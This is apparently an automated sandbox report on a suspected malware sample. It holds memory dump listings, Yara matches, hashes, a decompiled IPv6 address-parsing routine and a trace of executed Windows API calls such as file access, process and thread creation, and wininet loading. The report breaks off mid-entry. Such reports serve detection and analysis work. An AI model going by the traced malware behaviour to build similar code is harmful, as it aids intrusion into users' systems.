                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                        • API String ID: 0-3177188983
                                                                                        • Opcode ID: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                                                        • Instruction ID: f11e6a1eaff6db1fe2eea082ce974e9f3744e7dcae54dc36853e7edae2e0f247
                                                                                        • Opcode Fuzzy Hash: 3c6ade50251908d3014041db18730d57c095e05cdf33aab23ede356199a58e88
                                                                                        • Instruction Fuzzy Hash: 2341C5B1600204ABCB20DB68DD85FAA77F8AF44720F20C656F95A9B3C2D774E941C7A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00AAFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _t105;
                                                                                        				void* _t110;
                                                                                        				char _t114;
                                                                                        				short _t115;
                                                                                        				void* _t118;
                                                                                        				signed short* _t119;
                                                                                        				short _t120;
                                                                                        				char _t122;
                                                                                        				void* _t127;
                                                                                        				void* _t130;
                                                                                        				signed int _t136;
                                                                                        				intOrPtr _t143;
                                                                                        				signed int _t158;
                                                                                        				signed short* _t164;
                                                                                        				signed int _t167;
                                                                                        				void* _t170;
                                                                                        
                                                                                        				_t158 = 0;
                                                                                        				_t164 = _a4;
                                                                                        				_v20 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_t136 = 0;
                                                                                        				while(1) {
                                                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                                                        					if(_t167 == _t158) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t118 = _v20 - _t158;
                                                                                        					if(_t118 == 0) {
                                                                                        						if(_t167 == 0x3a) {
                                                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t119 =  &(_t164[1]);
                                                                                        								if( *_t119 != _t167) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t143 = 2;
                                                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                        								_v28 = 1;
                                                                                        								_v8 = _t143;
                                                                                        								_t136 = _t136 + 1;
                                                                                        								L47:
                                                                                        								_t164 = _t119;
                                                                                        								_v20 = _t143;
                                                                                        								L14:
                                                                                        								if(_v24 == _t158) {
                                                                                        									L19:
                                                                                        									_t164 =  &(_t164[1]);
                                                                                        									_t158 = 0;
                                                                                        									continue;
                                                                                        								}
                                                                                        								if(_v12 == _t158) {
                                                                                        									if(_v16 > 4) {
                                                                                        										L29:
                                                                                        										return 0xc000000d;
                                                                                        									}
                                                                                        									_t120 = E00AAEE02(_v24, _t158, 0x10);
                                                                                        									_t170 = _t170 + 0xc;
                                                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                        									_t136 = _t136 + 1;
                                                                                        									goto L19;
                                                                                        								}
                                                                                        								if(_v16 > 3) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								_t122 = E00AAEE02(_v24, _t158, 0xa);
                                                                                        								_t170 = _t170 + 0xc;
                                                                                        								if(_t122 > 0xff) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                        								goto L19;
                                                                                        							}
                                                                                        						}
                                                                                        						L21:
                                                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                        							break;
                                                                                        						} else {
                                                                                        							if(E00AA685D(_t167, 4) == 0) {
                                                                                        								if(E00AA685D(_t167, 0x80) != 0) {
                                                                                        									if(_v12 > 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t127 = 1;
                                                                                        									_a7 = 1;
                                                                                        									_v24 = _t164;
                                                                                        									_v20 = 1;
                                                                                        									_v16 = 1;
                                                                                        									L36:
                                                                                        									if(_v20 == _t127) {
                                                                                        										goto L19;
                                                                                        									}
                                                                                        									_t158 = 0;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								break;
                                                                                        							}
                                                                                        							_a7 = 0;
                                                                                        							_v24 = _t164;
                                                                                        							_v20 = 1;
                                                                                        							_v16 = 1;
                                                                                        							goto L19;
                                                                                        						}
                                                                                        					}
                                                                                        					_t130 = _t118 - 1;
                                                                                        					if(_t130 != 0) {
                                                                                        						if(_t130 == 1) {
                                                                                        							goto L21;
                                                                                        						}
                                                                                        						_t127 = 1;
                                                                                        						goto L36;
                                                                                        					}
                                                                                        					if(_t167 >= 0x80) {
                                                                                        						L7:
                                                                                        						if(_t167 == 0x3a) {
                                                                                        							_t158 = 0;
                                                                                        							if(_v12 > 0 || _v8 > 6) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t119 =  &(_t164[1]);
                                                                                        								if( *_t119 != _t167) {
                                                                                        									_v8 = _v8 + 1;
                                                                                        									L13:
                                                                                        									_v20 = _t158;
                                                                                        									goto L14;
                                                                                        								}
                                                                                        								if(_v28 != 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_v28 = _v8 + 1;
                                                                                        								_t143 = 2;
                                                                                        								_v8 = _v8 + _t143;
                                                                                        								goto L47;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                        							break;
                                                                                        						} else {
                                                                                        							_v12 = _v12 + 1;
                                                                                        							_t158 = 0;
                                                                                        							goto L13;
                                                                                        						}
                                                                                        					}
                                                                                        					if(E00AA685D(_t167, 4) != 0) {
                                                                                        						_v16 = _v16 + 1;
                                                                                        						goto L19;
                                                                                        					}
                                                                                        					if(E00AA685D(_t167, 0x80) != 0) {
                                                                                        						_v16 = _v16 + 1;
                                                                                        						if(_v12 > 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_a7 = 1;
                                                                                        						goto L19;
                                                                                        					}
                                                                                        					goto L7;
                                                                                        				}
                                                                                        				 *_a8 = _t164;
                                                                                        				if(_v12 != 0) {
                                                                                        					if(_v12 != 3) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					_v8 = _v8 + 1;
                                                                                        				}
                                                                                        				if(_v28 != 0 || _v8 == 7) {
                                                                                        					if(_v20 != 1) {
                                                                                        						if(_v20 != 2) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                        						L65:
                                                                                        						_t105 = _v28;
                                                                                        						if(_t105 != 0) {
                                                                                        							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                        							E00A88980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                        							_t110 = 8;
                                                                                        							E00A7DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                        						}
                                                                                        						return 0;
                                                                                        					}
                                                                                        					if(_v12 != 0) {
                                                                                        						if(_v16 > 3) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						_t114 = E00AAEE02(_v24, 0, 0xa);
                                                                                        						_t170 = _t170 + 0xc;
                                                                                        						if(_t114 > 0xff) {
                                                                                        							goto L29;
                                                                                        						}
                                                                                        						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                        						goto L65;
                                                                                        					}
                                                                                        					if(_v16 > 4) {
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					_t115 = E00AAEE02(_v24, 0, 0x10);
                                                                                        					_t170 = _t170 + 0xc;
                                                                                        					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                        					goto L65;
                                                                                        				} else {
                                                                                        					goto L29;
                                                                                        				}
                                                                                        			}

























                                                                                        0x00aafd36
                                                                                        0x00ac200b
                                                                                        0x00ac2012
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ac2018
                                                                                        0x00000000
                                                                                        0x00ac2018
                                                                                        0x00000000
                                                                                        0x00aafd36
                                                                                        0x00aafe0f
                                                                                        0x00aafe16
                                                                                        0x00aba3ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aba3b3
                                                                                        0x00aba3b3
                                                                                        0x00aafe1f
                                                                                        0x00aded25
                                                                                        0x00aded86
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded91
                                                                                        0x00aded95
                                                                                        0x00aded95
                                                                                        0x00aded9a
                                                                                        0x00adedad
                                                                                        0x00adedb3
                                                                                        0x00adedba
                                                                                        0x00adedc4
                                                                                        0x00adedc9
                                                                                        0x00000000
                                                                                        0x00adedcc
                                                                                        0x00aded2a
                                                                                        0x00aded55
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded61
                                                                                        0x00aded66
                                                                                        0x00aded6e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded7d
                                                                                        0x00000000
                                                                                        0x00aded7d
                                                                                        0x00aded30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00aded3c
                                                                                        0x00aded43
                                                                                        0x00aded4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: __fassign
                                                                                        • String ID:
                                                                                        • API String ID: 3965848254-0
                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction ID: 6a50e41646b47c1980c265edfacf295a30a039e2d4310635294674c490e1da3c
                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                        • Instruction Fuzzy Hash: CD916D71E0024AEFDF28DF98C8456AEB7B4EF56314F24807AD451AB2A2E7305A41CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,000D3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000D3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000D820D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: 8d5d2a02fff64b2c8bfbe8d84dfccc8dd20026de004411d28e01eb37b2caff17
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: 3EF0B6B2200208ABCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtClose.NTDLL(0=,?,?,000D3D30,00000000,FFFFFFFF), ref: 000D8315
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: 0=
                                                                                        • API String ID: 3535843008-3480422529
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: 8a2de22ac62212a321528d150a748bf6b49eeecd8c018c29a0c065f9874f3435
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: A6D01776200314ABD710EF98CC85EE77BADEF48760F158499BA189B282C930FA0087E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,000D3A11,?,?,?,?,000D3A11,FFFFFFFF,?,R=,?,00000000), ref: 000D82B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: 5d4bbeb23d6cb19e3cc0a62c51b11b6aa16a238382542759e52415da46e8321b
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: EFF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 000D6F88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D84FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3B93), ref: 000D84FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C72BA
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C72DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000C9B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D8594
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000D8594
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCD0,?,?), ref: 000D704C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CCCD0,?,?), ref: 000D704C
                                                                                        Memory Dump Source
